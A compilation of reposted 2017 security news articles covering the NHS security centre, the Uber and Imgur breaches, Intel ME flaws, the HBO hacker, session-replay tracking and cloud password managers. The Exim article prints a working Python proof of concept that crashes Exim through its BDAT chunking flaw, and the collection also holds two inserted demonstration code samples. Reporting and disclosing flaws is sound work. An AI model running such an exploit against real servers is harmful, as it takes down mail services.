STE WILLIAMS

Looking for scrubs? Nah, NHS wants white hats – the infosec techie kind

The UK’s National Health Service will pay white hat hackers up to £20m to protect its IT systems, it announced today.

NHS Digital is looking to make a deal with consultants to create a security operations centre, which it says will ensure the safety of staff and patient data nationwide.

Speaking to The Telegraph, NHS Digital said the contract “will provide access to extra specialist resources during peak periods and enable the team to proactively monitor the web for security threats and emerging vulnerabilities.”

This comes against the backdrop of the WannaCry ransomware attack in May this year, which demonstrated the NHS’ lack of preparedness for dealing with a large attack across several locations at once.

An investigation by the Chartered Institute for IT concluded that it was a lack of accountability and investment which led to the attack, while the National Audit Office said the NHS had failed to respond to early warnings about potential threats, and that the attack “could have been prevented by the NHS following basic IT security best practice”.

The new unit will be initially tasked with protecting the systems proactively, by hunting down vulnerabilities in NHS Digital’s network, then searching for weaknesses in individual hospitals’ cyber defences if necessary.

In another move to improve its effectiveness during major incidents, NHS Digital launched cyber security text alerts for its staff last week. They will be used by the cybersecurity response team, CareCERT, to update staff members during high-level attacks. ®

The NHS has pointed out that the “new investment will boost the existing services provided by NHS Digital in this space”.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/27/20m_vaccine_for_nhs_cybersecurity/

Time to Pull an Uber and Disclose Your Data Breach Now

There is never a good time to reveal a cyber attack. But with EU’s GDPR looming, the fallout is only going to get harder and more expensive if you wait.

Uber has finally disclosed that the company experienced a cyber breach in 2016 when the personal details of both drivers and customers were hacked by cybercriminals. Apparently, the company also paid a small ransom to have the data destroyed.

Here we go again. Another data breach … another CSO gets the axe and departs for mishandling a major incident which, sadly, is becoming a common trend. 

The big news here is that Uber concealed the data breach, which increased the cyber-risk to both drivers and customers and cost the company the trust of investors and governments. The mishandling of credentials for an Amazon Web Services (AWS) account was reportedly behind the data breach, a deficiency that demonstrates that companies really need to adhere to the industry recommendations on securing and protecting privileged credentials. Not protecting these credentials can lead to major cyber incidents, making the difference between a simple perimeter breach and a cyber catastrophe. Privileged access management (PAM) has long been a major problem and this incident is just another example of a company not managing access and securing the keys to the kingdom.

According to Forrester Research, approximately 80% of data breaches (registration required) are a result of stolen or compromised privileged credentials making privileged credentials security a must for many industry regulations. Not protecting them exposes companies to compliance failure as well as data breaches like we have now seen with Uber. This data breach also demonstrates the importance of incident handling as a major part of an organization’s cybersecurity policy – and doing it right can change the outcome of many cyber incidents. You cannot wait until it is too late to get your incident response plan in place.    

In the time since this data breach occurred, Uber has experienced a change in CEOs and disclosure of this breach gives Uber CEO Dara Khosrowshahi an opportunity to set things straight and change a perception that has dogged Uber for the past few years surrounding many scandals.

Why now? Why should organizations follow Uber’s poor example of disclosure ASAP?

With the upcoming EU General Data Protection Regulation (GDPR), which goes into enforcement in May 2018, businesses of all sizes, around the world, will face huge financial penalties for failure to disclose data breaches and be required to follow a strict 72-hour breach notification to authorities in the countries impacted. The GDPR replaces the European General Data Protection Directive from 1995 and provides the foundation for companies taking responsibility for protecting European citizens’ private data. 

This means organizations are accountable and responsible for all the information they collect. The more information they gather, the more data they must account for, and therefore the more data they are responsible for. If a data breach occurs, and it is found that adequate security measures were not in place, there are significant penalties and fines: 20 million euros or 4% of annual turnover. In my rough calculation, if we use Uber’s gross bookings from 2016 of $20 billion (USD), then Uber, once GDPR is in force after May 2018, could face possible financial penalties of $800 million, which of course would be much higher than anything it faces by disclosing the data breach today.

Bottom line: If you are hiding a major data breach like Uber, you might want to pull an Uber and disclose it ASAP.

Or maybe you have not found the data breach yet. Then you had better get looking immediately before it is too late and you put your entire business (and with it, your reputation) at risk.  I suspect many companies that provide services to EU citizens will need to think hard about keeping major data breaches a secret. We may see more companies, like Uber, face the reality that now is a good time to put out their dirty laundry and survive the tougher cyber regulations looming on the horizon.

Cybersecurity should never be an afterthought. Protecting privileged accounts, especially those that provide access to customer and employee personal data, should be a major priority along with a solid incident response plan and training on how to respond effectively and according to regulations and compliance requirements. Lastly, in today’s threat environment, cybersecurity has to become everyone’s responsibility. We need to empower our employees to be the strongest link because we are all on the front line and we need to ensure that everyone on the front line is educated and protected.   


Joseph Carson is a cybersecurity professional and ethical hacker with more than 25 years’ experience in enterprise security specializing in blockchain, endpoint security, network security, application security and virtualization, access controls and privileged account …

Article source: https://www.darkreading.com/risk/time-to-pull-an-uber-and-disclose-your-data-breach-now/a/d-id/1330488?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

8 Low or No-Cost Sources of Threat Intelligence

Here’s a list of sites that for little or no cost give you plenty of ideas for where to find first-rate threat intelligence.

Image Source: BeeBright / Shutterstock.com

Organizations know they need to get serious about threat intelligence, but it’s not always clear where to find credible information. While just about every security industry vendor website offers up information on the latest threats, some are better than others. Here, we’ll point out the sites that are the most informative and useful.

We called on Roselle Safran, president of Rosint Labs, to work with us to build a meaningful list. Safran’s extensive experience in cybersecurity includes several years of service in the Executive Office of the President and Department of Homeland Security during the Obama administration.

Safran included some obvious choices from federal government sources, but she also struts her cybergeek stuff by offering up some lesser-known sites that track ransomware and malware. We combined forces with Safran to develop a list that will give novices the threat intelligence amuse-bouche they need while supplying some intel red meat for experienced security pros.

Go through the list. You’ll find that there are many more than eight sites to choose from:

 

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md.

Article source: https://www.darkreading.com/threat-intelligence/8-low-or-no-cost-sources-of-threat-intelligence-------/d/d-id/1330447?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Exim-ergency! Unix mailer has RCE, DoS vulnerabilities

Sysadmins who tend Exim servers have been advised to kick off their working weeks with the joy of patching.

The popular (if relatively low-profile) Internet mail message transfer agent (MTA) advised of flaws in a Black Friday post to its public bugtracker, which as contributor Phil Pennock said in this message came without any prior notice.

The bug tracker post explained that when parsing the BDAT data header, Exim scans for the ‘.’ character to signify the end of an e-mail. BDAT is a server verb associated with the MTA’s ability to handle large attachments in chunks (see RFC 1830, for example).

The advisory included a proof-of-concept (less than 30 lines, below). The poster explained that because a function pointer, receive_getc, is not reset, the PoC makes Exim run out of stack and crash.

The announcement for CVE-2017-16944 identified the slip as existing in the “receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89”.

Confirming the bug, Pennock said the developers have a “tentative patch” but it needs to be confirmed.

The workaround in the meantime, he said, is to disable chunking by setting the following flag:

chunking_advertise_hosts=

The empty value after the equal sign turns off the vulnerable function.

According to a November 2017 study by E-Soft, Exim is by far the most popular MTA on the Internet, in use on nearly 57 per cent of MX servers it identified. ®

The proof-of-concept

# pip install pwntools
# Python 2 / pwntools script as posted to the Exim bug tracker. Backslash
# escapes (\x7f, \r, \n) are written out in full here. As the poster
# explained, the result is stack exhaustion and a crash of the daemon.
from pwn import *

r = remote('localhost', 25)

r.recvline()                              # 220 greeting
r.sendline("EHLO test")
r.recvuntil("250 HELP")                   # end of the EHLO reply (CHUNKING must be advertised)
r.sendline("MAIL FROM:test@localhost")
r.recvline()
r.sendline("RCPT TO:test@localhost")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')             # oversized line ending in a DEL (0x7f) byte
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')                      # switch to chunked (BDAT) input with a 1-byte chunk
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)    # filler data (Python 2 integer division)
r.send(s+ ':\r\n')                        # the BDAT reader is left in place: receive_getc is not reset
r.recvuntil('command')
#raw_input()
r.send('\n')                              # Exim now recurses until it runs out of stack
r.interactive()
exit()

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/26/exim_rce_vulnerability/

.GIF garage Imgur plugs 1.7 million-subscriber creds breach

The world’s self-described “most awesome” collection of images, Imgur, has confessed to leaking 1.7 million user records in 2014.

The company was advised of the breach by HaveIBeenPwned administrator Troy Hunt on November 23, 2017.

Imgur’s chief operating officer Roy Sehgal posted confirmation of the breach. Hunt took to Twitter to say that notice came 25 hours after he notified the company it had a problem.

Hunt also noted that 60 per cent of the e-mail addresses he examined were already in the HaveIBeenPwned database after being revealed in previous breaches of other sites.

Imgur’s notice said users’ registered e-mail addresses and hashed passwords were leaked, but no personally-identifying information was included. Here’s an excerpt from the company’s statement:

“Early morning on November 24th, we confirmed that approximately 1.7 million Imgur user accounts were compromised in 2014. The compromised account information included only email addresses and passwords. Imgur has never asked for real names, addresses, phone numbers, or other personally-identifying information (“PII”), so the information that was compromised did NOT include such PII.”

The only risk to passwords is that until 2016 Imgur used plain SHA-256 to hash passwords, and that algorithm is fast enough to be susceptible to brute-force attacks. The company has therefore required affected users to change their password.

Sehgal said the site’s investigation into how the breach occurred is ongoing. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/27/imgur_breach/

Worries over Intel’s Management Engine grow after new flaws found

What is the world’s most widely-used operating system on new PCs?

Windows?

Guess again.

In all probability, it’s the venerable operating system Minix, running on a shadowy subsystem called the Management Engine (ME) that’s built into all recent Intel computers.

Officially, ME is there to make remote troubleshooting for support engineers easier, including – and this is not a misprint – when the PC is turned off but still plugged into the wall.

But ME’s ubiquity and startling capabilities matter to a growing body of critics worried about the security implications of running what, in effect, is an independent system-within-a-system – the Intel-inside-Intel if you like.

The latest salvo was September’s promise by Russian researchers Maxim Goryachy and Mark Ermolov of Positive Technologies to host a session at next month’s Black Hat Europe event during which they would demo an exploit capable of compromising ME to gain “god mode” control over a PC.

This week Intel put out an urgent security advisory confirming the issue, so it seems the pair weren’t simply talking up their presentation to get bums on seats.

Intel lists four ME vulnerabilities (CVE-2017-5705, CVE-2017-5708, CVE-2017-5711, CVE-2017-5712), affecting a swathe of recent processors running ME Firmware v11.x onwards as well as Server Platform Services v4.0 and TXE v3.0.

Several vulnerable processors are listed – anyone running a computer or server based on a Core, Xeon, Atom, Celeron, or Pentium from the last two years can assume they are affected.

Intel has posted a utility to check for these bugs, but ME firmware fixes will need to come from each hardware maker, which is where things get messier.

For instance, a visit to Dell’s support pages lists fixes for its servers but also shows the words “to be determined” next to 100 or more of the PC systems the company supports.

Users looking for a quick fix shouldn’t hold their breath.

What could an attacker do to an unpatched system?

Intel mentions several possibilities, but an alarming standout is the ability to “load and execute arbitrary code outside the visibility of the user and operating system.”

A lot of admins will find themselves doing a double-take reading this, particularly the idea that something inside a PC can run code without the desktop or server operating system being in charge.

Unhappiness at the way ME bends the rules has been steadily growing – and not just from the tinfoil hat brigade.

The privacy group EFF described ME as a tiny homunculus computer, complete with its own operating system, processor chip, drivers, network stack and web server.

Then, in August, Google engineer Ronald Minnich mentioned that the search giant was so unsettled by the security risks of ME running its own Minix operating system that it planned to rip out as much of ME as possible from its Linux servers.

Interestingly, Microsoft’s recent secure PC specification made no mention of ME beyond endorsing Intel’s new processor generation.

What is clear is that researchers smell blood and will continue to probe ME and equivalent low-level technologies for weaknesses.

After this week, few will bet against them finding more problems.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Cxlxc4kQyR0/

Alleged HBO hacker is an Iranian the FBI can’t arrest

The biggest hurdle to catching cybercriminals is usually that they are hard to identify or connect to alleged crimes.

Sometimes, a suspect is identified but nobody knows where they are.

And then there is the rarer but frustrating situation where the authorities are sure they know the identity of an attacker, and where they live, but still can’t apprehend them.

This seems to be the case with Behzad Mesri, alleged by US prosecutors to be behind May’s spectacular attack on HBO that resulted in the leaking of 1.5TB of data, including un-aired episodes of several popular shows, a Game of Thrones script, staff contacts, account credentials, and financial data.

Quite a haul, that reportedly came with a gloating ransom note demanding “our 6-month salary in bitcoin,” equivalent to $6m (£4.5m).

The barrier to arresting Mesri –  who allegedly used the online alias “Skote Vahshat” – is that he lives in Iran, a country the US has notoriously poor relations with, let alone anything resembling an extradition agreement.

If they did somehow nab him, the indictment submitted to the United States District Court in Manhattan suggests he’d be quite a catch.

This claims Mesri is connected to an Iranian hacking group calling itself the Turk Black Hat Security Team, which appears to be well known within Iran.

Says the indictment:

As a member of that group, Mesri conducted hundreds of website defacements…against websites in the US and elsewhere.

HBO wasn’t his only target, it seems.

He accessed HBO’s content by compromising multiple user accounts, it adds, which at least reduces the troubling possibility that the attack was aided by a malicious insider who is still in place.

Is publicly pursuing a man beyond reach a cry in the dark?

It might appear so until you read that the FBI is so sure it has its man, it has released a photograph of him and added his name to its scary most wanted list.

This is significant. Most countries have something similar, but none has the abstract menace of the FBI’s – being added to it is still a powerful way of signalling that the US will pursue a suspect for as long as it takes to hold them to account.

As acting US attorney Joon H. Kim put it:

The memory of American law enforcement is very long.

Which might suggest that the US thinks that making his status public will act as a deterrent to other hackers, and perhaps even to Iran itself, to hacking conducted from inside Iran’s borders.

Still, there’s a risk that by adding a suspect on the list, this boosts their notoriety and prestige within hacking circles.

The irony is that Mesri’s alleged activities did little apparent harm to HBO’s business, indeed a separate sequence of accidental leaks of show episodes by the company’s business partners was probably more damaging.

The great HBO hack won’t be remembered as another Sony Pictures disaster by any means – but it might come to be viewed as the moment the US decided to demystify hacking by making it personal.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/kcW4wBG908c/

A gargantuan all-seeing eye is watching you on popular websites

Next time you visit a popular website imagine that your arrival on the site coincides with the arrival of a film crew at whatever home, office, coffee shop or bus stop you happen to be occupying.

A cameraman erects his tripod and rests the camera’s lens just above your shoulder with such haste that the page you’re visiting hasn’t even finished loading before a lens is locked on to it, greedily inhaling everything that happens on your screen.

Your head and hands are out of shot but every mouse wobble, scroll, click and keystroke is recorded.

You forget he’s there as you browse around, dropping things in and out of your shopping cart but the lens sees and saves everything. You move through the checkout process and get to a page that wants your name, address and credit card details. You fill them in before having a change of heart and deciding, no, you don’t need another pair of khakis. You don’t hit ‘submit’.

As the data sits unsent on your screen the cameraman reaches across, unrolls a short length of sticky tape, slaps it over your credit card number and then films everything you decided not to share.

As he flashes you a look that tells you exactly how clever he thinks he was for covering up that credit number you notice that your name, address, email, CVV and credit card expiry date didn’t get any tape. Come to think of it, you can’t remember him doing that to your password when you logged in earlier either.

Of course that story isn’t true, it all happens without a cameraman.

The eye of Sauron

It happens because of JavaScript, a programming language that can be embedded in web pages and which, more than any other technology, turns the World Wide Web from a collection of documents into a collection of interactive apps.

Its very old, featureful and well-established tool bag bulges with such useful things as: the clientX and clientY properties that capture the exact location of your cursor at any moment; the onkeypress event that coughs up whatever keys you’ve pressed; the value property that holds the contents of input fields; as well as countless other objects, properties and events that give websites access to everything from your physical location to the amount of battery charge in your laptop.

JavaScript’s features can be woven together to make everything from live chat clients and games to cryptocurrency miners and session replay scripts that record every single thing you do on a website.

Session replay scripts act just like a silent cameraman, recording aspects of your visit like how long you spend on each page, where your mouse goes and what you type, so that it can be played back like a movie by the site’s owner.

They exist to help website owners improve their sites by observing how users engage with them.

But how many users realise that this is even possible, that so much data is being gathered, that their choice to click “submit” or not doesn’t matter and that all the data that’s harvested is under the care of third-party tracking companies?

A recent study by researchers at Princeton University called No boundaries: Exfiltration of personal data by session-replay scripts revealed the extent to which session replay code is used on popular websites, and highlighted a number of serious privacy concerns that occur as a consequence.

Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third-party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behavior. The same is true for the collection of user inputs during checkout and registration processes.

Using a fairly conservative methodology the researchers looked for evidence of recording by seven of the top session replay companies: Yandex, FullStory, Hotjar, UserReplay, Smartlook, Clicktale, and SessionCam.

They were found on 482 of the top 50,000 sites, on domains as interesting as hp.com, intel.com, comcast.net, lenovo.com, costco.com and gap.com. Alongside their writeup the researchers have made a full list of the sites available.

The researchers identified three serious issues:

Failure to redact passwords

The research notes that all the services that were monitored took steps to prevent the accidental capture of passwords by excluding HTML password input fields. The trouble is that doesn’t always work (my emphasis):

…mobile-friendly login boxes that use text inputs to store unmasked passwords are not redacted by this rule, unless the publisher manually adds redaction tags to exclude them. We found at least one website where the password entered into a registration form leaked to SessionCam, even if the form is never submitted.

Failure to redact sensitive data

The replay scripts all take steps to automatically exclude the sensitive data you use when logging in, searching or making purchases, and provide tools for site owners to configure it for themselves. That’s laudable but, like all the best plans, it doesn’t survive contact with real life.

Four of the six tracking systems – FullStory, Hotjar, Yandex and Smartlook – will happily suck up your name, email address, phone number, address, date of birth and social security number if they fall into their maw. Hotjar and Yandex extend that laissez faire attitude to your credit card’s CVV number and expiry date.

The automatic redaction rules that do exist, to exclude things like passwords and credit card numbers, rely on websites to do their data capture in the same, predictable ways. They do not, which leads to cases like this (my emphasis):

FullStory redacts credit card fields with the `autocomplete` attribute set to `cc-number`, but will collect any credit card numbers included in forms without this attribute.

Automatic redaction also only applies to one type of data gathering done by replay scripts.

Alongside the data captured by monitoring key strokes or the contents of input fields, the scripts also capture “rendered page content” (screen grabs). Automatically redacting information that appears in screen grabs is hard (my emphasis):

…none of the companies appear to provide automated redaction of displayed content by default; all displayed content in our tests ended up leaking.

Instead, session recording companies expect sites to manually label all personally identifying information included in a rendered page.

That’s right, it’s up to individual sites to make sure your data isn’t hoovered up by the all-seeing, all-screen-grabbing eye of Sauron. And that, dear reader, means you cannot rely on it happening.

Why? Because the path most often taken in software development is the path of least resistance. In this case that path leads to your data being hoovered up in screen grabs of the websites you’re visiting.

For it to not happen, this has to happen:

…a site’s web application developers would need to work with the site’s marketing and analytics teams to iteratively scrub personally identifying information from recordings as it’s discovered. Any [small] change to the site design … requires a review of the redaction rules.

Not. Going. To. Happen.
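The two quoted findings above, the unredacted “mobile-friendly” password box and the card number that is only redacted when autocomplete="cc-number" is set, share one cause: attribute-based redaction records everything by default and masks only fields that carry a marker it recognises. The Node.js model below is an added example (not code from the Princeton study or any replay vendor): it implements the two rules as the article describes them, shows which constructed fields slip past them, and contrasts a deny-by-default rule set in which a value is recorded only if the site has marked it safe. Form fields are plain objects carrying HTML attributes, and the data-replay="allow" marker is an assumed convention for this example.

```javascript
// Added example (not from the Princeton study or any replay vendor): a model of
// attribute-based replay redaction versus deny-by-default. Fields are plain
// objects carrying the HTML attributes a replay script would read; all values
// are constructed and fake.

// Vendor-style rules as the article describes them: mask password inputs and
// inputs marked autocomplete="cc-number"; record everything else.
function redactByAttributeRules(field) {
  if (field.type === 'password') return true;
  if (field.autocomplete === 'cc-number') return true;
  return false;
}

// Deny-by-default: a value is recorded only if the site explicitly marked the
// field safe (data-replay="allow", an assumed convention). Everything else is masked.
function redactDenyByDefault(field) {
  return field['data-replay'] !== 'allow';
}

// What a replay script would ship for the form under a given rule set:
// each field's name plus either its value or a same-length mask.
function captureForm(fields, shouldRedact) {
  return fields.map((f) => ({
    name: f.name,
    value: shouldRedact(f) ? '*'.repeat(f.value.length) : f.value,
  }));
}

// Names of non-empty fields whose raw value reached the recording.
function leakedFields(fields, shouldRedact) {
  return captureForm(fields, shouldRedact)
    .filter((c, i) => fields[i].value !== '' && c.value === fields[i].value)
    .map((c) => c.name);
}

// Constructed login/checkout form.
const SAMPLE_FORM = [
  { name: 'email', type: 'email', value: 'alice@example.test' },
  // Conventional password box: caught by the type=password rule.
  { name: 'password', type: 'password', value: 'correct horse' },
  // "Mobile-friendly" box that shows the password: a plain text input, not caught.
  { name: 'password_visible', type: 'text', value: 'correct horse' },
  // Card number with the autocomplete hint: caught.
  { name: 'card', type: 'text', autocomplete: 'cc-number', value: '4111111111111111' },
  // Same number on a form that never added the hint: recorded.
  { name: 'card_legacy', type: 'text', value: '4111111111111111' },
  // CVV has no rule at all in this model.
  { name: 'cvv', type: 'text', value: '123' },
  // The one field the site deliberately marked as safe to record.
  { name: 'search', type: 'text', value: 'khakis', 'data-replay': 'allow' },
];
```

Under the attribute rules five of the seven fields leak, including the visible password, the unmarked card number and the CVV; under deny-by-default only the search box does. The cost of the second approach is exactly the one the study describes: someone has to mark every safe field, and every design change has to be reviewed, which is why the default matters more than the rule list.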

Your data leaks during recording and playback

So far we’ve only concerned ourselves with the actual snagging of your data, but that’s just half the story. Once it’s been gobbled up your data has to be shunted somewhere else, stored and then made available for playback.

These days it’s more common than not to move data, any data, around the web using HTTPS, the secure and encrypted form of HTTP. It protects against MitM (Man-in-the-Middle) attacks that can steal or change your data, and it provides a degree of assurance that data is being sent to where it’s supposed to go.

Since the data captured by replay scripts could potentially contain passwords, credit card numbers, social security numbers, dates of birth, medical data or other highly sensitive, personal information, we’d expect HTTPS to be used when your data is sent to the third party recording services’ websites…

Yandex and Hotjar deliver the publisher page content over HTTP — data that was previously protected by HTTPS is now vulnerable to passive network surveillance.

…and when it’s played back to the site owner.

The publisher dashboards for Yandex, Hotjar, and Smartlook all deliver playbacks within an HTTP page, even for recordings which take place on HTTPS pages.

What to do?

Session recording is a complex business so it’s normally carried out by third party services. Those third party services can be disrupted in the same way that you might disrupt other forms of unwanted online tracking or analytics, by using third-party browser plugins like Ghostery or Privacy Badger.

The research also shows the hopeless, toothless, pointlessness of the not-quite-dead-yet DNT (Do Not Track) proposal that hopes to get websites to behave themselves by asking them nicely (my emphasis):

At least one of the five companies we studied (UserReplay) allows publishers to disable data collection from users who have Do Not Track (DNT) set in their browsers. We scanned the configuration settings of the Alexa top 1 million publishers using UserReplay on their homepages, and found that none of them chose to honor the DNT signal.

Disrupting known, third-party scripts only goes so far though. Developing a full session recording and playback capability is too big a job for most websites but using some of its techniques – such as tracking mouse movements or key strokes – isn’t very difficult at all (and it never has been).

Short of reading each website’s source code and forming a judgement about the intentions of its developers, there’s nothing you can do about that.

GDPR

It’s just possible that the tide is about to turn on services like this though.

In May 2018 Europe’s new rules dealing with how data is collected, stored, accessed and used; how users are told about those things; and what happens if you fail to do them, will come into effect.

What’s got everyone’s attention about the General Data Protection Regulation (GDPR) though is the size of the punch it packs. Firms that fall foul of the new rules could face fines of up to €20m (about $24m) or 4% of global annual turnover, whichever is bigger.

Storing the wrong data in the wrong way is about to become very expensive, making certain types of data much more of a liability and much less of an asset.

When we asked Sophos’s own Senior Cybersecurity Director, Ross McKerchar, in October for his cybersecurity predictions for the next six months, it was top of his list:

I expect to spend a lot of time in the next 6 months deleting unnecessary data and generally being very careful about what we store and where. It’s a defence in depth measure – the less you store the less you have to lose.

Let’s hope he’s not the only one.

If you want to know more about the problems of session replay tracking read the original research.


Image of 2015 NASM “Violent Universe”: Jeremy Schnittman courtesy of Flickr user goddard studio 13 under Creative Commons license.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/OudfJPGw00E/

Cloud storage for password managers – are you for or against?

Any time we discuss password managers, the ensuing commentary can sometimes get a little heated. People really love their password managers (and we love to hear that!)

One of the biggest, if not THE biggest, point of contention, however, is the cloud. Specifically, the cloud as a place to store your password vault, the cache of your credentials that your password manager absolutely needs to keep safe at all costs.

This is a clear dividing line for many password manager aficionados. Do you trust third-party cloud storage as a place to store your vault – dozens upon dozens, if not hundreds of credentials – or do you choose to keep your vault in places that are exclusively owned and maintained by you?

Let’s break it down.

Arguments for the Cloud

Synchronisation across devices

If you use credentials across multiple browsers, devices and locations, the ability to keep all that data in one central location means that, no matter the device you are on, you know you are always using the most up-to-date credentials.

There’s no work needed in version-managing a password vault file, as there’s only one vault and it’s always current. If you change your password using one device, the moment you access that service on another device your credentials have already been synced.

Yes, there’s encryption

The encryption measures used to secure password vaults in the cloud can get an unfair rap. Most cloud-based password managers encrypt your password data on your device, before it gets sent anywhere on the internet, and that encrypted data is sent to and from cloud storage using an encrypted connection.

For many of the services I’ve looked into, the keys to encrypt and decrypt your password data are generated and kept locally on your device and never touch the internet at all.

This should mean that you, and only you, can decrypt your passwords. The makers of the password manager can’t read your passwords and if their cloud storage is breached – which, while unlikely, has happened in the past – the treasure trove of encrypted password vaults it contains is useless without the individual keys to unlock each and every vault. There’s nothing the crooks can do, and no data can be extracted, without your keys.

(Assuming a strong master password and a properly configured key-derivation function, the time it would take to brute-force just one of these vaults with even the most advanced tech we have now would measure, conservatively, in many multiples of the age of the Universe. The caveat is the master password: the key-derivation step only multiplies the cost of each guess, so a short or reused master password shrinks that figure to something an attacker with a rack of GPUs can afford. I know your Facebook password is valuable, but it’s not that valuable.)
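To make the client-side model concrete, here is an added example (not code from the article or from any of the products it names) of how a vault could be encrypted before it leaves the device. It uses only Python’s standard library: PBKDF2 stretches the master password into an encryption key and a MAC key, the vault is encrypted with a counter-mode keystream built from HMAC-SHA256 and the result is authenticated with the separate MAC key before anything is decrypted. The construction, the iteration count, the field names and the sample vault are all assumptions for illustration; a production manager would use a vetted AEAD such as AES-GCM from a maintained library rather than a hand-built stream cipher.

```python
import base64
import hashlib
import hmac
import json
import os

# Added illustration of client-side vault encryption; not code from the article
# or from any password manager it mentions. Uses only the standard library so it
# runs anywhere. The HMAC-SHA256 counter-mode keystream plus encrypt-then-MAC
# below stands in for the vetted AEAD (AES-GCM, XChaCha20-Poly1305) a real
# product would use; the iteration count and sample data are assumptions.

KDF_ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor


def derive_keys(master_password: str, salt: bytes, iterations: int = KDF_ITERATIONS):
    """Stretch the master password into an encryption key and a MAC key.

    This runs on the user's device. Neither the password nor the derived keys
    ever leave it; only the random, non-secret salt is stored with the vault.
    """
    material = hashlib.pbkdf2_hmac(
        "sha256", master_password.encode("utf-8"), salt, iterations, dklen=64
    )
    return material[:32], material[32:]


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream using HMAC-SHA256 as the PRF (demo construction)."""
    blocks, counter = bytearray(), 0
    while len(blocks) < length:
        blocks += hmac.new(enc_key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(blocks[:length])


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def _authenticated_data(salt: bytes, nonce: bytes, iterations: int, ciphertext: bytes) -> bytes:
    # Everything the server stores is covered by the tag, so an attacker who
    # edits the blob (including lowering the iteration count) is detected.
    return salt + nonce + iterations.to_bytes(4, "big") + ciphertext


def encrypt_vault(master_password: str, vault: dict, iterations: int = KDF_ITERATIONS) -> dict:
    """Encrypt the vault on the device. The returned blob is all that is synced."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = derive_keys(master_password, salt, iterations)
    plaintext = json.dumps(vault, sort_keys=True).encode("utf-8")
    ciphertext = _xor(plaintext, _keystream(enc_key, nonce, len(plaintext)))
    tag = hmac.new(mac_key, _authenticated_data(salt, nonce, iterations, ciphertext), hashlib.sha256).digest()
    b64 = base64.b64encode
    return {
        "kdf": "pbkdf2-hmac-sha256",
        "iterations": iterations,
        "salt": b64(salt).decode("ascii"),
        "nonce": b64(nonce).decode("ascii"),
        "ciphertext": b64(ciphertext).decode("ascii"),
        "tag": b64(tag).decode("ascii"),
    }


def decrypt_vault(master_password: str, blob: dict) -> dict:
    """Reverse of encrypt_vault. Raises ValueError on a wrong password or a modified blob."""
    d = base64.b64decode
    salt, nonce, ciphertext, tag = d(blob["salt"]), d(blob["nonce"]), d(blob["ciphertext"]), d(blob["tag"])
    iterations = int(blob["iterations"])
    enc_key, mac_key = derive_keys(master_password, salt, iterations)
    expected = hmac.new(mac_key, _authenticated_data(salt, nonce, iterations, ciphertext), hashlib.sha256).digest()
    # Verify before decrypting, in constant time, so nothing is revealed about
    # the plaintext when the password is wrong or the blob has been altered.
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong master password or tampered vault")
    return json.loads(_xor(ciphertext, _keystream(enc_key, nonce, len(ciphertext))).decode("utf-8"))


def server_view(blob: dict) -> str:
    """Exactly what the cloud provider holds: opaque fields, no keys, no passwords."""
    return json.dumps(blob)


if __name__ == "__main__":
    vault = {"example.com": {"user": "alice", "password": "correct horse battery staple"}}  # constructed sample
    blob = encrypt_vault("a long and unusual master passphrase", vault)
    print(server_view(blob))
    print(decrypt_vault("a long and unusual master passphrase", blob) == vault)
```

The server_view function shows what a breached provider would actually hold: salt, nonce, ciphertext and tag, none of which help without the master password. The decrypt path shows why a wrong password, a tampered ciphertext or a downgraded iteration count is rejected before any plaintext is produced. The caveat from the paragraph above still stands: PBKDF2 only multiplies the attacker’s cost per guess, so the entropy of the master password sets the real ceiling.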

Ease of use for the non-technical

This might not seem like a big deal for those of you who don’t mind a few rough edges, but you can’t discount the impact of good usability and design. Many of the cloud-based password managers are proprietary software designed to make money for their creators (so that’s a plus or minus depending on how you feel), which means they have budget for things like design expertise, user testing, and customer support.

They try to make their tools as easy to understand and as easy to use as possible. You don’t have to be a security nerd, or even a security neophyte, to get up and running. The tools work and work quite well.

Arguments against the cloud

Trusting a third party

For many people, the idea of handing over private credentials to a third party is sacrilege. These credentials are the keys to your kingdom – your finances, your social life, your email, everything – and you’re handing them over to another company.

That company (and everyone in it) might have your best interests in mind, but the so-called “insider threat” is real, software has vulnerabilities and companies make mistakes, so you’d be sensible to behave as if they don’t.

Your passwords move through a chain of infrastructure that encrypts your data and connects your devices to the cloud, and you are relying on all of that to be well maintained and free from security vulnerabilities. As I mentioned above, cloud-based password managers like LastPass have had some security troubles in the past (since fixed), including some nasty flaws in LastPass’s two-factor authentication.

All eggs in one big basket

While some people are just philosophically opposed to entrusting their information to anyone else, no matter what level of encryption is used, others see cloud-based password storage as a single point of failure.

That concern is only multiplied by the idea of putting your entire password vault out of reach, in a place that you don’t own and can’t directly configure or control. You could take every possible precaution to secure your account, but ultimately keeping your passwords safe relies on the client-side encryption I described earlier working exactly as advertised, and on a master password strong enough to make that encryption worth anything.

Needless to say, password vaults stored en masse by vendors are a much bigger target, offering a much bigger potential pay off for criminal hackers, than just a single password vault stored by one person.

Cost

Sometimes the features you really want in a third-party password manager come with a price, either one-time or subscription based. Generally, these are for features and not the base password manager itself, though if your budget is zero any cost is prohibitive.

Decisions, decisions…

If you find yourself leaning towards keeping your data close to your chest, a password manager that gives you full control over where you store your password vault, like KeePass, is likely the best fit for you.

